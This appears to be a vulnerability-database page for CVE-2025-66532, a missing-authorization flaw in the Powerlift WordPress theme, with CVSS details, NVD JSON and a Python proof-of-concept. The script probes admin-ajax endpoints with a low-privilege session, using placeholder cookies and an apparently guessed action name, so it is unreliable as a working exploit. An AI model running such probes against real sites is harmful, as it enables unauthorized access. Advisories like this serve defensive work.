Security Vulnerability Report
中文
CVE-2025-66532 CVSS 4.3 MEDIUM

CVE-2025-66532

Published: 2025-12-09 16:18:21
Last Modified: 2026-04-27 18:16:39

Description

Missing Authorization vulnerability in Mikado-Themes Powerlift powerlift allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Powerlift: from n/a through < 3.2.1.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:qodeinteractive:powerlift:*:*:*:*:*:wordpress:*:* - VULNERABLE
Powerlift < 3.2.1
Powerlift n/a 至 3.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-66532 PoC - Powerlift Missing Authorization # Target: WordPress site with Powerlift theme < 3.2.1 target = sys.argv[1] if len(sys.argv) > 1 else "http://target-site.com" # Common Powerlift AJAX endpoints endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/powerlift/v1/", ] headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Content-Type": "application/x-www-form-urlencoded" } # Authenticated low-privilege user session cookies = { "wordpress_test_cookie": "WP+Cookie+check", # Add valid session cookie for low-privilege user "wordpress_logged_in_[hash]": "low_privilege_user_session" } def test_unauthorized_access(): print(f"[*] Testing Powerlift theme authorization bypass on {target}") print(f"[*] CVE-2025-66532 - Missing Authorization in Powerlift < 3.2.1") # Test admin-level actions with low-privilege session payload = { "action": "powerlift_admin_action", "security": "", "data": "test" } for endpoint in endpoints: url = target + endpoint try: response = requests.post(url, data=payload, headers=headers, cookies=cookies, timeout=10) print(f"[+] Endpoint: {endpoint}") print(f" Status: {response.status_code}") print(f" Response: {response.text[:200]}") except requests.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") if __name__ == "__main__": test_unauthorized_access()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66532", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:20.607", "lastModified": "2026-04-27T18:16:38.730", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Mikado-Themes Powerlift powerlift allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Powerlift: from n/a through < 3.2.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qodeinteractive:powerlift:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "3.2.1", "matchCriteriaId": "67D02D9C-CA42-4D7B-B380-F64420C60CB2"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/powerlift/vulnerability/wordpress-powerlift-theme-3-2-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}